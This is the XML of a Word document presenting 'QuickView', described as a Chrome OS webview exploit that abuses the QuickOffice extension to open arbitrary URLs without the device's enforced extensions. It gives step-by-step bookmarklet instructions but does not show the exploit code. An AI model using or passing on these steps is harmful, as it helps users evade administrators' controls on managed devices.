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16"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="1A73E8"/>
          <w:sz w:val="574"/>
          <w:szCs w:val="574"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2">
        <w:r>
          <w:rPr>
            <w:color w:val="1A73E8"/>
            <w:sz w:val="574"/>
            <w:szCs w:val="574"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>██████</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="216"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="216"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="216"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>QuickView Standalone Edition:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="216"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5/3</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/23 version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="216"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="720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7200"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:lineRule="auto" w:line="216" w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:lineRule="auto" w:line="216" w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:anchor behindDoc="0" distT="0" distB="0" distL="114300" distR="114300" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="2">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>34925</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>-5715</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="835025" cy="835025"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="1" name="Picture 1" descr="https://ading.fr.to/quickview/img/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ding.fr.to/quickview/img/icon.png"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId3"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="835025" cy="835025"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Q</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>uickView is a universal webview exploit in Chrome OS that utilizes the QuickOffice component extension. This exploit lets you create login windows with arbitrary URLs, thus allowing you to load pages without any extensions.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:lineRule="auto" w:line="216" w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:lineRule="auto" w:line="216" w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">A blog post with an explanation is available on </w:t>
            </w:r>
            <w:hyperlink r:id="rId4">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="InternetLink"/>
                  <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                  <w:kern w:val="0"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
                </w:rPr>
                <w:t>my website</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:lineRule="auto" w:line="216" w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:lineRule="auto" w:line="216" w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:lineRule="auto" w:line="216" w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Instructions:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:lineRule="auto" w:line="216" w:before="0" w:after="0"/>
              <w:contextualSpacing/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Copy the code on the next page, from the “javascript:” part to the end of the box.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:lineRule="auto" w:line="216" w:before="0" w:after="0"/>
              <w:contextualSpacing/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Create a new bookmark with the code you just copied as the URL.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:lineRule="auto" w:line="216" w:before="0" w:after="0"/>
              <w:contextualSpacing/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Click on the large blue link on the previous page.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:lineRule="auto" w:line="216" w:before="0" w:after="0"/>
              <w:contextualSpacing/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>On the “about:blank#blocked” page that was just opened, click on the newly created bookmarklet.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:lineRule="auto" w:line="216" w:before="0" w:after="0"/>
              <w:contextualSpacing/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>The QuickView GUI should open, and you can now enter any URL to open it in an unblocked webview.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:lineRule="auto" w:line="216" w:before="0" w:after="0"/>
              <w:contextualSpacing/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">You can open another webview at any time by visiting </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="InternetLink"/>
                <w:sz w:val="20"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:instrText> HYPERLINK "https://www.google.com/" \l " " \n _blank</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="InternetLink"/>
                <w:sz w:val="20"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="InternetLink"/>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>https://www.google.com/#%20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="InternetLink"/>
                <w:sz w:val="20"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>, and this will persist until a reboot. However, if you want to use the full GUI, you will still have to return to this page.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl/>
              <w:spacing w:lineRule="auto" w:line="216" w:before="0" w:after="0"/>
              <w:ind w:left="0" w:hanging="0"/>
              <w:contextualSpacing/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:lineRule="auto" w:line="216" w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:lineRule="auto" w:line="216" w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:u w:val="single"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Credits:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:lineRule="auto" w:line="216" w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">QuickView was created by vk6#7391 and Bypassi#7037, and it is licensed under the </w:t>
            </w:r>
            <w:hyperlink r:id="rId5" w:tgtFrame="_blank">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="InternetLink"/>
                  <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                  <w:kern w:val="0"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
                </w:rPr>
                <w:t>GNU GPL v3</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">. The source code is available at: </w:t>
            </w:r>
            <w:hyperlink r:id="rId6" w:tgtFrame="_blank">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="InternetLink"/>
                  <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                  <w:kern w:val="0"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
                </w:rPr>
                <w:t>https://github.com/ading2210/quickview</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:lineRule="auto" w:line="216" w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">This exploit is part of the </w:t>
            </w:r>
            <w:hyperlink r:id="rId7">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="InternetLink"/>
                  <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                  <w:kern w:val="0"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
                </w:rPr>
                <w:t>{swarm} project</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">nd utilizes a variation of the </w:t>
            </w:r>
            <w:hyperlink r:id="rId8" w:tgtFrame="_blank">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="InternetLink"/>
                  <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                  <w:kern w:val="0"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
                </w:rPr>
                <w:t>point-blank</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>xploit.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:lineRule="auto" w:line="216" w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
